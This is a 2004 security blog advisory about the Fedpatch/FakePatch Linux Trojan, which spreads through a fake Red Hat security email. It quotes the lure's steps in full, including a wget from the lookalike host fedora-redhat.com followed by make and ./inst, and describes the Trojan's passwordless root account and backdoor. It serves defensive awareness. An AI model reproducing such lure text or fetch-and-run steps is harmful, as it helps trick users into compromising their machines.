know the vector. stop the exploit. block the virus.

vectorblog  about  contact

 

 

 

 

 

 

 

 


Fedpatch/Fake Red Hat Patch Mailer

infectionvectors.com

November 2004

 

Vector:        Email/download

 

Impact:        Low (low distribution, site blocked, low percentage of RH devices)

 

Linux entries to the virus databases of most AV vendors are sparse; discoveries of new Trojans written for UNIX platforms often generate attention simply because they are not Windows-based malcode. The last worm that garnered attention on the Linux front was Slapper, which used an OpenSSL exploit to inject itself onto machines around the world.

 

October of 2004 saw a new Linux-targeted piece of malware, known as “FakePatch” or “Fpatch” by the large AV vendors. This Trojan is sent via email and directs users to download a “security patch” (“fileutils”) from a server located at “fedora-redhat.com” which is not to be confused with the legitimate “fedora.redhat.com” site operated by Red Hat Linux.

 

The Trojan creates a user account (“bash”) with root privileges and no password on the victim machine. It also creates a directory in tmp: “././././././././.” which marks machines as infected.

 

Email contains the following exhortation:

 

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

- First download the patch from the Security RedHat mirror: wget

www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz

- cd fileutils-1.0.6.patch

- make

- ./inst

 

Warning: URL listed above for research only, do not attempt to connect to/download from this site.

 

Two files are downloaded in the gz archive: inst.c and makefile. Once compiled and executed, the Trojan opens a secure shell daemon on the victim box and emails the author of the device that has been compromised.

 

This is a good reminder that no OS or security software is immune to social engineering vectors: if an attacker can successfully entice a user to download and execute code, there is little technical defense that can protect the target machine.

 

 

 

Copyright Ó 2004 infectionvectors.com. All rights reserved.